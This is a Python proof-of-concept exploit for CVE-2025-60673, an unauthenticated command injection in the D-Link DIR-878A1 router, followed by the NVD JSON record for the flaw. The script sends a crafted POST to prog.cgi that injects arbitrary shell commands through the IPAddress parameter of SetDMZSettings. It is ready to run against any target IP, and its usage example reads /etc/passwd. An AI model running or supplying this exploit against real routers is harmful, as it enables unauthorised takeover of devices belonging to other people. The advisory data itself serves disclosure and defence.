CVE-2025-60673

#!/usr/bin/env python3 """ CVE-2025-60673 PoC - D-Link DIR-878A1 SetDMZSettings Command Injection This PoC demonstrates unauthenticated command injection in D-Link DIR-878A1 router. """ import requests import sys def exploit(target_ip, injected_command="echo vulnerable > /tmp/pwned"): """ Exploit the SetDMZSettings command injection vulnerability. Args: target_ip: IP address of the vulnerable D-Link router injected_command: Command to execute on the target device """ # Target URL for the vulnerable prog.cgi endpoint url = f"http://{target_ip}/prog.cgi" # The malicious payload exploits the IPAddress parameter # We inject a command by adding shell metacharacters after the IP address # The format typically requires a valid-looking IP prefix followed by command injection payload = { "SetDMZSettings": "1", "IPAddress": f"127.0.0.1;{injected_command} #", "enable": "1" } print(f"[*] Target: {target_ip}") print(f"[*] Sending malicious request...") print(f"[*] Payload: {payload}") try: # Send POST request without authentication response = requests.post(url, data=payload, timeout=10) print(f"[+] Request sent successfully") print(f"[*] Response status: {response.status_code}") if response.status_code == 200: print("[+] Exploit likely successful - check if command was executed") else: print("[-] Unexpected response") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [command]") print(f"Example: {sys.argv[0]} 192.168.0.1 'cat /etc/passwd'") sys.exit(1) target = sys.argv[1] command = sys.argv[2] if len(sys.argv) > 2 else "echo PWNED" exploit(target, command)

{"cve": {"id": "CVE-2025-60673", "sourceIdentifier": "[email protected]", "published": "2025-11-13T19:15:48.167", "lastModified": "2025-11-17T19:03:53.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated command injection vulnerability exists in the D-Link DIR-878A1 router firmware FW101B04.bin. The vulnerability occurs in the 'SetDMZSettings' functionality, where the 'IPAddress' parameter in prog.cgi is stored in NVRAM and later used by librcm.so to construct iptables commands executed via twsystem(). An attacker can exploit this vulnerability remotely without authentication by sending a specially crafted HTTP request, leading to arbitrary command execution on the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-878_firmware:1.01b04:*:*:*:*:*:*:*", "matchCriteriaId": "CF6C5938-ACC7-4DD4-B3EF-AD64468AD60F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-878:a1:*:*:*:*:*:*:*", "matchCriteriaId": "70A35F2E-E46F-47CF-BF0F-9CF9A3242EDC"}]}]}], "references": [{"url": "http://d-link.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/yifan20020708/SGTaint-0-day/blob/main/DLink/DLink-DIR-878/CVE-2025-60673.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}